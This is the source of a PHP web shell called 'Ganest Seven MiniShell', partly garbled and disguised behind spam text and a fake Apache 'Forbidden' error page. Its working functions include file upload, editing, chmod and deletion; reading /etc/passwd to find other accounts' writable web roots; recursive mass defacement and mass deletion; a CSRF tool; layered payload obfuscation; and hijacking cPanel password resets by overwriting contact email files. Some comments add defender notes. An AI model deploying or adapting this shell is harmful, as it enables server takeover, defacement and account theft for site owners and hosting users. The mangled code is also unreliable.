shell

A

Additionally, you will likely free essay writing help online find yourself able to choose from several distinct services instead of trying to get customized essays written by somebody you don’t know.

single poor sentence will cost you.

<font-family=”sans serif=””>’; ?>

‘; ?> </font-family=”sans>


You don’t have permission to access
on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


 Apache/2.2.14 (Ubuntu) Server at localhost Port 80
‘;
exit;
}
}
?>

$value){
$_POST[$key] = stripslashes($value);
}
}

echo ‘

-=[ Ganest Seven MiniShell ]=-

<font-family=”sans serif=””>
DestaX – RivalX – Demon King – AbiiGans – Andree – LutfiiFake – DemonArmy – Demon Grafia – Dinaa – Demon Alivos77- TnDew4 – Demon Altery – IboyDimas – DemonKiller – Demon Night – FarhanX- HafizHaxor – Litle_Sky – RizalX – Vn9 – Fauzan – Hasby – DAN BAPAK KOU


“;
echo ”

[ Home ]
[ Jumping ]
[ Mass Deface ]
[ Server Info ]
[ Mass Delete ]
[ New File ]
[ New Folder ]
[ Encode/Decode ]
[ CSRF ]
[ Reset Cpanel ]
[ About ]
[ Logout ]

“;
if(isset($_GET[‘filesrc’])){
echo “

Path : ‘;
if(isset($_GET[‘path’])){
$path = $_GET[‘path’];
}else{
$path = getcwd();
}
$path = str_replace(”,’/’,$path);
$paths = explode(‘/’,$path);
foreach($paths as $id=>$pat){
if($pat == ” && $id == 0){
$a = true;
echo ‘/‘;
continue;
}
if($pat == ”) continue;
echo ‘‘.$pat.’/’;
}
echo ‘
‘;
if(isset($_FILES[‘file’])){
if(copy($_FILES[‘file’][‘tmp_name’],$path.’/’.$_FILES[‘file’][‘name’])){
echo ‘Upload Berhasil
‘;
}else{
echo ‘Upload Gagal
‘;
}
}
echo ‘

File Upload :

‘;
echo ”

Command :

“;
echo “

Current File : “;
echo $_GET[‘filesrc’];
echo ‘

‘;
echo(‘

'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'

‘);
}elseif(isset($_GET[‘option’]) && $_POST[‘opt’] != ‘delete’){
echo ‘

</font-family=”sans>

‘.$_POST[‘path’].’

‘;
if($_POST[‘opt’] == ‘chmod’){
if(isset($_POST[‘perm’])){
if(chmod($_POST[‘path’],$_POST[‘perm’])){
echo ‘Change Permission Berhasil
‘;
}else{
echo ‘Change Permission Gagal
‘;
}
}
echo ‘

Permission :


‘;
}elseif($_POST[‘opt’] == ‘rename’){
if(isset($_POST[‘newname’])){
if(rename($_POST[‘path’],$path.’/’.$_POST[‘newname’])){
echo ‘Ganti Nama Berhasil
‘;
}else{
echo ‘Ganti Nama Gagal
‘;
}
$_POST[‘name’] = $_POST[‘newname’];
}
echo ‘

New Name :


‘;
}elseif($_POST[‘opt’] == ‘edit’){
if(isset($_POST[‘src’])){
$fp = fopen($_POST[‘path’],’w’);
if(fwrite($fp,$_POST[‘src’])){
echo ‘Berhasil Edit File
‘;
}else{
echo ‘Gagal Edit File
‘;
}
fclose($fp);
}
echo ‘




‘;
}
echo ‘

‘;
}else{
echo ‘

‘;
if(isset($_GET[‘option’]) && $_POST[‘opt’] == ‘delete’){
if($_POST[‘type’] == ‘dir’){
if(rmdir($_POST[‘path’])){
echo ‘Directory Terhapus
‘;
}else{
echo ‘Directory Gagal Terhapus
‘;
}
}elseif($_POST[‘type’] == ‘file’){
if(unlink($_POST[‘path’])){
echo ‘File Terhapus
‘;
}else{
echo ‘File Gagal Dihapus
‘;
}
}
}
// command
if($_POST[‘execmd’]) {
echo “
“;
}
// about
elseif($_GET[‘array’] == ‘about’){
echo “
أ—
Website أ—
أ— Youtube أ—
أ— Facebook أ—
أ— Subscribe Channel Youtube أ—

“;
}
//Jumping
elseif($_GET[‘array’] == ‘jumping’){
$i = 0;
echo ”

“;
if(preg_match(“/hsphere/”, $dir)) {
$urls = explode(“\r\n”, $_POST[‘url’]);
if(isset($_POST[‘jump’])) {
echo ”

";
			foreach($urls as $url) {
				$url = str_replace(array("http://","www."), "", strtolower($url));
				$etc = "/etc/passwd";
				$f = fopen($etc,"r");
				while($gets = fgets($f)) {
					$pecah = explode(":", $gets);
					$user = $pecah[0];
					$dir_user = "/hsphere/local/home/$user";
					if(is_dir($dir_user) === true) {
						$url_user = $dir_user."/".$url;
						if(is_readable($url_user)) {
							$i++;
							$jrw = "[R] $url_user";
							if(is_writable($url_user)) {
								$jrw = "[RW] $url_user";
							}
							echo $jrw."
";
						}
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "
Total ada ".$i." Kamar di ".$ip;
		}
		echo "

“;
} else {
echo ‘

List Domains:

‘;
}
} elseif(preg_match(“/vhosts|vhost/”, $dir)) {
preg_match(“/\/var\/www\/(.*?)\//”, $dir, $vh);
$urls = explode(“\r\n”, $_POST[‘url’]);
if(isset($_POST[‘jump’])) {
echo ”

";
			foreach($urls as $url) {
				$url = str_replace("www.", "", $url);
				$web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
				if(is_dir($web_vh) === true) {
					if(is_readable($web_vh)) {
						$i++;
						$jrw = "[R] $web_vh";
						if(is_writable($web_vh)) {
							$jrw = "[RW] $web_vh";
						}
						echo $jrw."
";
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "
Total ada ".$i." Kamar di ".$ip;
		}
		echo "

“;
} else {
echo ‘

List Domains:

‘;
}
} else {
echo ”

";
		$etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd");
		while($passwd = fgets($etc)) {
			if($passwd == '' || !$etc) {
				echo "Can't read /etc/passwd";
			} else {
				preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
				foreach($user_jumping[1] as $user_idx_jump) {
					$user_jumping_dir = "/home/$user_idx_jump/public_html";
					if(is_readable($user_jumping_dir)) {
						$i++;
						$jrw = "[R] $user_jumping_dir";
						if(is_writable($user_jumping_dir)) {
							$jrw = "[RW] $user_jumping_dir";
						}
						echo $jrw;
						if(function_exists('posix_getpwuid')) {
							$domain_jump = file_get_contents("/etc/named.conf");	
							if($domain_jump == '') {
								echo " => ( gabisa ambil nama domain nya )
";
							} else {
								preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
								foreach($domains_jump[1] as $dj) {
									$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
									$user_jumping_url = $user_jumping_url['name'];
									if($user_jumping_url == $user_idx_jump) {
										echo " => ( $dj )
";
										break;
									}
								}
							}
						} else {
							echo "
";
						}
					}
				}
			}
		}
		if($i == 0) { 
		} else {
			echo "
Total ada ".$i." Kamar di ".$ip;
		}
		echo "

“;
}
echo ”

“;
}

//Server Info
elseif($_GET[‘array’] == ‘server_info’){

echo “Software : “;
echo ““.$_SERVER[‘SERVER_SOFTWARE’].”
“;
echo “PHP Version : “;
echo ““.PHP_VERSION.”
“;
echo “ | “;
echo “OS : “;
echo ““.PHP_OS.”
“;
echo ”
Your IP : “;
echo ““.$_SERVER[‘REMOTE_ADDR’].”
“;
echo “ | “;
echo “Server IP : “;
echo ““.gethostbyname($_SERVER[‘HTTP_HOST’]).”
“;
echo “Server : “;
echo ”
“.php_uname().”

“;
}
// mass deface
elseif($_GET[‘array’] == ‘mass_deface’) {
/**
 * Recursive branch of this web shell's "Mass Deface" action: writes one
 * payload under one file name throughout a directory tree.
 *
 * The only call site visible on this page passes $_POST['d_dir'],
 * $_POST['d_file'] and $_POST['script'] straight through, so all three
 * arguments are request-controlled and unvalidated.
 *
 * Defender note: on disk this appears as many files with the same name and
 * identical content created across sibling directories during one request,
 * written by whichever account PHP runs as. File-integrity monitoring and a
 * content-hash sweep of the web roots surface it.
 *
 * @param $dir         Directory path handed to is_writable() and scandir().
 * @param $namafile    File name appended to every directory entry.
 * @param $isi_script  Content handed to file_put_contents() for every target.
 * @return void        Nothing is returned; one line per subdirectory is echoed.
 */
function sabun_massal($dir,$namafile,$isi_script) {
// Nothing happens unless the starting directory itself is writable.
if(is_writable($dir)) {
// scandir() also yields the . and .. entries; they are handled separately below.
$dira = scandir($dir);
foreach($dira as $dirb) {
// $dirc is the entry path, $lokasi the target file inside that entry.
$dirc = “$dir/$dirb”;
$lokasi = $dirc.’/’.$namafile;
if($dirb === ‘.’) {
// Target is $dir/./$namafile, i.e. the starting directory itself.
file_put_contents($lokasi, $isi_script);
} elseif($dirb === ‘..’) {
// Target is $dir/../$namafile: the parent of $dir is written too,
// without any writability check on it.
file_put_contents($lokasi, $isi_script);
} else {
// Ordinary entries: only writable subdirectories are touched.
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo “[DONE] $lokasi
“;
file_put_contents($lokasi, $isi_script);
// Descend into the subdirectory. The function has no return statement,
// so $idx is always null; it is never read.
$idx = sabun_massal($dirc,$namafile,$isi_script);
}
}
}
}
}
}
/**
 * Single-level branch of this web shell's "Mass Deface" action: writes one
 * payload under one file name into a directory, its parent and its immediate
 * writable subdirectories. It does not descend further.
 *
 * The only call site visible on this page passes $_POST['d_dir'],
 * $_POST['d_file'] and $_POST['script'] straight through, so all three
 * arguments are request-controlled and unvalidated.
 *
 * Defender note: the on-disk trace is a set of same-named, same-content files
 * one level below the chosen directory plus one in its parent; comparing
 * content hashes of that file name across sibling directories confirms scope.
 *
 * @param $dir         Directory path handed to is_writable() and scandir().
 * @param $namafile    File name appended to every directory entry.
 * @param $isi_script  Content handed to file_put_contents() for every target.
 * @return void        Nothing is returned; one line per subdirectory is echoed.
 */
function sabun_biasa($dir,$namafile,$isi_script) {
// Nothing happens unless the starting directory itself is writable.
if(is_writable($dir)) {
// scandir() also yields the . and .. entries; they are handled separately below.
$dira = scandir($dir);
foreach($dira as $dirb) {
// $dirc is the entry path, $lokasi the target file inside that entry.
$dirc = “$dir/$dirb”;
$lokasi = $dirc.’/’.$namafile;
if($dirb === ‘.’) {
// Target is $dir/./$namafile, i.e. the starting directory itself.
file_put_contents($lokasi, $isi_script);
} elseif($dirb === ‘..’) {
// Target is $dir/../$namafile: the parent of $dir is written too,
// without any writability check on it.
file_put_contents($lokasi, $isi_script);
} else {
// Ordinary entries: only writable subdirectories are touched, one level deep.
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo “[DONE] $lokasi
“;
file_put_contents($lokasi, $isi_script);
}
}
}
}
}
}
if($_POST[‘start’]) {
if($_POST[‘tipe_sabun’] == ‘mahal’) {
echo ”

“;
sabun_massal($_POST[‘d_dir’], $_POST[‘d_file’], $_POST[‘script’]);
echo “

“;
} elseif($_POST[‘tipe_sabun’] == ‘murah’) {
echo ”

“;
sabun_biasa($_POST[‘d_dir’], $_POST[‘d_file’], $_POST[‘script’]);
echo “

“;
}
} else {
echo ”

“;
echo ”

Tipe Mass Deface:
BiasaMassal
Folder:

Filename:

Index File:

“;
}
}
// mass delete
elseif($_GET[‘array’] == ‘mass_delete’) {
/**
 * Worker for this web shell's "Mass Delete" action: removes files that carry
 * a given name from a directory, its parent and its writable subdirectories.
 *
 * The only call site visible on this page passes $_POST['d_dir'] and
 * $_POST['d_file'] straight through, so both arguments are request-controlled
 * and unvalidated.
 *
 * Defender note: the trace is a run of unlink operations on one file name
 * across a tree within a single request. Where unlink auditing is not
 * enabled, backups or file-integrity baselines are needed to establish which
 * copies were removed.
 *
 * @param $dir       Directory path handed to is_writable() and scandir().
 * @param $namafile  File name looked for in each directory.
 * @return void      Nothing is returned; one line per deleted subdirectory file is echoed.
 */
function hapus_massal($dir,$namafile) {
// Nothing happens unless the starting directory itself is writable.
if(is_writable($dir)) {
// scandir() also yields the . and .. entries; they are handled separately below.
$dira = scandir($dir);
foreach($dira as $dirb) {
// $dirc is the entry path, $lokasi the candidate file inside that entry.
$dirc = “$dir/$dirb”;
$lokasi = $dirc.’/’.$namafile;
if($dirb === ‘.’) {
// The . entry maps to the file directly inside the starting directory.
if(file_exists(“$dir/$namafile”)) {
unlink(“$dir/$namafile”);
}
} elseif($dirb === ‘..’) {
// The .. entry maps to the same file name in the parent of $dir;
// no writability check is made on the parent.
if(file_exists(“”.dirname($dir).”/$namafile”)) {
unlink(“”.dirname($dir).”/$namafile”);
}
} else {
// Ordinary entries: only writable subdirectories are considered.
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($lokasi)) {
echo “[DELETED] $lokasi
“;
unlink($lokasi);
// The recursive call sits inside the file_exists() check, so descent
// continues only below subdirectories that contained the file.
// The function returns nothing, so $idx is always null; it is never read.
$idx = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST[‘start’]) {
echo ”

“;
hapus_massal($_POST[‘d_dir’], $_POST[‘d_file’]);
echo “

“;
} else {
echo ”

“;
echo ”

Folder:

Filename:

“;
}
}
// create file
elseif($_GET[‘array’] == ‘newfile’) {
if($_POST[‘new_save_file’]) {
$newfile = htmlspecialchars($_POST[‘newfile’]);
$fopen = fopen($newfile, “a+”);
if($fopen) {
$act = ““;
} else {
$option = “permission denied“;
}
}
echo $option;
echo ”

Filename:

“;
}
// create dir / folder
elseif($_GET[‘array’] == ‘newfolder’) {
if($_POST[‘new_save_folder’]) {
$new_folder = $path.’/’.htmlspecialchars($_POST[‘newfolder’]);
if(!mkdir($new_folder)) {
$option = “permission denied“;
} else {
$act = ““;
}
}
echo $option;
echo ”

Folder Name:

“;
}
// csrf exploiter
elseif($_GET[‘array’] == ‘csrf’){
echo ‘

URL:
POST File:

‘;
$url = $_POST[“url”];
$pf = $_POST[“pf”];
$d = $_POST[“d”];
if($d) {
echo ”

“;
}
}
// encode / decode
elseif($_GET[‘array’] == ‘endecode’) {
$text = $_POST[‘code’];
$submit = $_POST[‘submit’];
if (isset($submit)){
$op = $_POST[“ope”];
switch ($op) {case ‘base64’: $codi=base64_encode($text);
break;case ‘str’ : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
break;case ‘json’ : $codi=json_encode(utf8_encode($text));
break;case ‘gzinflate’ : $codi=base64_encode(gzdeflate(str_rot13($text)));
break;case ‘gzinflater’ : $codi=base64_encode(str_rot13(gzdeflate($text)));
break;case ‘gzinflatex’ : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
break;case ‘gzinflatew’ : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
break;case ‘gzinflates’ : $codi=base64_encode(gzdeflate($text));
break;case ‘str2’ : $codi=base64_encode(str_rot13($text));
break;case ‘urlencode’ : $codi=rawurlencode($text);
break;case ‘ur’ : $codi=convert_uuencode($text);
break;case ‘url’ : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
break;default:break;}}

$submit = $_POST[‘submits’];
if (isset($submit)){
$op = $_POST[“ope”];
switch ($op) {case ‘base64’: $codi=base64_decode($text);
break;case ‘str’ : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
break;case ‘json’ : $codi=utf8_dencode(json_dencode($text));
break;case ‘gzinflate’ : $codi=str_rot13(gzinflate(base64_decode($text)));
break;case ‘gzinflater’ : $codi=gzinflate(str_rot13(base64_decode($text)));
break;case ‘gzinflatex’ : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
break;case ‘gzinflatew’ : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
break;case ‘gzinflates’ : $codi=gzinflate(base64_decode($text));
break;case ‘str2’ : $codi=str_rot13(base64_decode($text));
break;case ‘urlencode’ : $codi=rawurldecode($text);
break;case ‘ur’ : $codi=convert_uudecode($text);
break;case ‘url’ : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
break;default:break;}}
$html = htmlentities(stripslashes($codi));
echo ‘


‘;
echo “


“;
}
// cpanel reset password
elseif($_GET[‘array’] == ‘cpanel’){
echo ‘Reset Password Cpanel

Email :

‘;

$user = get_current_user();
$site = $_SERVER[‘HTTP_HOST’];
$ips = getenv(‘REMOTE_ADDR’);

if(isset($_POST[‘submit’])){

$email = $_POST[’email’];
$wr = ’email:’.$email;
$f = fopen(‘/home/’.$user.’/.cpanel/contactinfo’, ‘w’);
fwrite($f, $wr);
fclose($f);
$f = fopen(‘/home/’.$user.’/.contactinfo’, ‘w’);
fwrite($f, $wr);
fclose($f);
$parm = $site.’:2083/resetpass?start=1′;
echo ‘


Done tinggal lu ewe aja:v
Klik disini


‘;
}
}

echo ”;
$scandir = scandir($path);
echo ‘

‘;

foreach($scandir as $dir){
if(!is_dir($path.’/’.$dir) || $dir == ‘.’ || $dir == ‘..’) continue;
echo ‘

‘;
}
echo ‘

‘;
foreach($scandir as $file){
if(!is_file($path.’/’.$file)) continue;
$size = filesize($path.’/’.$file)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).’ MB’;
}else{
$size = $size.’ KB’;
}

echo ‘

‘;
}
echo ‘

Name
Size
Permission
Modify
‘.$dir.’
‘;
if(is_writable($path.’/’.$dir)) echo ‘‘;
elseif(!is_readable($path.’/’.$dir)) echo ‘‘;
echo perms($path.’/’.$dir);
if(is_writable($path.’/’.$dir) || !is_readable($path.’/’.$dir)) echo ‘
‘;

echo ‘





‘.$file.’
‘.$size.’
‘;
if(is_writable($path.’/’.$file)) echo ‘‘;
elseif(!is_readable($path.’/’.$file)) echo ‘‘;
echo perms($path.’/’.$file);
if(is_writable($path.’/’.$file) || !is_readable($path.’/’.$file)) echo ‘
‘;
echo ‘





‘;
}
echo ‘


Copyright © Ganest Seven


‘;
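/**
 * Render a path's mode bits as the ten-character string used by `ls -l`
 * (for example "-rw-r--r--" or "drwxr-xr-x").
 *
 * The string literals in the extracted listing were delimited by typographic
 * quotes, which PHP does not treat as string delimiters; they are restored to
 * ASCII quotes here. A failed fileperms() call is handled explicitly and
 * yields the same "unknown type, no bits set" string the arithmetic on
 * `false` produced before.
 *
 * @param string $file Path whose mode is read with fileperms().
 * @return string One type character followed by three rwx triads.
 */
function perms($file)
{
    $perms = fileperms($file);
    if ($perms === false) {
        // fileperms() could not stat the path: unknown type, no permission bits.
        return 'u---------';
    }

    // File-type masks, tested in this order; the first full match wins.
    $types = array(
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => '-', // regular file
        0x6000 => 'b', // block special
        0x4000 => 'd', // directory
        0x2000 => 'c', // character special
        0x1000 => 'p', // FIFO pipe
    );

    $info = 'u'; // unknown unless a mask below matches
    foreach ($types as $mask => $char) {
        if (($perms & $mask) === $mask) {
            $info = $char;
            break;
        }
    }

    // One row per triad: read bit, write bit, execute bit, special bit,
    // then the character shown when the special bit is set with and
    // without the execute bit.
    $triads = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner, setuid
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group, setgid
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world, sticky
    );

    foreach ($triads as $triad) {
        list($read, $write, $exec, $special, $withExec, $withoutExec) = $triad;

        $info .= ($perms & $read) ? 'r' : '-';
        $info .= ($perms & $write) ? 'w' : '-';

        if ($perms & $exec) {
            $info .= ($perms & $special) ? $withExec : 'x';
        } else {
            $info .= ($perms & $special) ? $withoutExec : '-';
        }
    }

    return $info;
}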
?>